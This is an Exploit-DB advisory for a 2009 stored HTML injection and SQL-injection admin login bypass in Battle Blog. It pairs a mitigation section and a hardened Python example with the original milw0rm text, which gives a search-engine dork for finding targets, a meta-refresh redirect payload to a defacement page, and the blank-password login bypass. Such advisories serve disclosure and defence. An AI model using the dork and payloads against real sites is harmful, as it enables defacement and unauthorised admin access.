Vendor: Battle Blog
Author: $qL_DoCt0r
CVSS: 7.5 (HIGH)
Type: SQL/HTML Injection
CWE: 89, 79
Product Name: Battle Blog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2009

Battle Blog SQL/HTML Injection Vulnerability

Two issues are present. The comment section of the blog accepts HTML/XSS in the comment body: an attacker submits the markup as a comment, and it is executed whenever the page is loaded. The admin page's login form is also vulnerable: SQL entered in the username field, with the password field left blank, grants access to the admin page.

Mitigation:

Input validation should be applied to the comment form and to the username field of the admin login: comment text should be encoded before it is rendered, and the admin login query should not be assembled from the submitted username.
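The following is an added example of the hardened form of the two inputs the advisory names; it is not Battle Blog's own code (the product is classic ASP and the advisory does not include its source). It assumes a users table with username and password_hash columns, uses an in-memory SQLite database so it runs offline, and goes one step beyond the "input validation" wording above by encoding comment text on output, which is the fix that actually stops stored HTML from being interpreted. The admin account and its password are constructed here for the demonstration.

```python
"""Hardened login and comment rendering for the two inputs in the advisory.

Added example, not Battle Blog's own code.  Assumes a users table with
username and password_hash columns; SQLite is used only so the example
runs offline.
"""
import hashlib
import hmac
import html
import sqlite3


def _pw_hash(password: str) -> str:
    # Illustrative hash; a real deployment would use a salted, slow KDF.
    return hashlib.sha256(password.encode()).hexdigest()


def build_db() -> sqlite3.Connection:
    """Construct an in-memory users table with a single admin account (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (?, ?)", ("admin", _pw_hash("correct horse")))
    conn.commit()
    return conn


def admin_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Authenticate the admin form without composing SQL from its inputs.

    A blank password is rejected before any query runs; the username is
    bound as a parameter, so whatever it contains can only ever match as a
    literal value; the hash comparison is constant-time.
    """
    if not username or not password:
        return False
    row = conn.execute(
        "SELECT password_hash FROM users WHERE username = ?", (username,)
    ).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], _pw_hash(password))


def render_comment(name: str, body: str) -> str:
    """Render a comment so any markup in it is displayed as text, never interpreted."""
    return '<div class="comment"><b>{}</b><p>{}</p></div>'.format(
        html.escape(name, quote=True), html.escape(body, quote=True)
    )


if __name__ == "__main__":
    db = build_db()
    print(admin_login(db, "admin", "correct horse"))   # True
    print(admin_login(db, "admin", ""))                # False: blank password rejected
    print(admin_login(db, "o'brien", "anything"))      # False: quote is just data
    print(render_comment("visitor", '<meta HTTP-EQUIV="REFRESH" content="0; url=http://example.invalid/">'))
```

A username containing a quote character is passed through unchanged as a bound parameter and simply fails to match any row, and a blank password never reaches the database at all. The rendered comment contains `&lt;meta ...&gt;` rather than a live tag, so the browser shows the markup instead of acting on it.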

Exploit-DB raw data:

###################################################################
#        battle blog sql/html injection vulnerability             #
###################################################################

author: $qL_DoCt0r
email: cookiestealer375@gmail.com
msn: sidthesloth@windowslive.com
blog: http://full-discl0sure.blogspot.com

html injection vulnerability

dork:inurl:comment.asp intext:Your e-mail address will be used to send you voting and comment activity. Inclusion of your address is optional but Battle Blog cannot notify you of these activities unless you supply an accurate e-mail.

once on blog...
scroll down to: make new comment

fill in the name: website: e-mail: forms
then type your html/xss as the comment, e.g.: <meta HTTP-EQUIV="REFRESH" content="0; url=http://yoursite.com/deface.htm">
click preview
then submit
if you're doing a redirect you need to click submit fast
NOTE: iframes do not work because the submit button doesn't appear
on some blogs you can use Firebug to make a submit button!


sql injection vulnerability

dork: same as before

just look on the navigation bar to the side and click admin

type your sql as the username
and leave the password field blank.

# milw0rm.com [2009-07-17]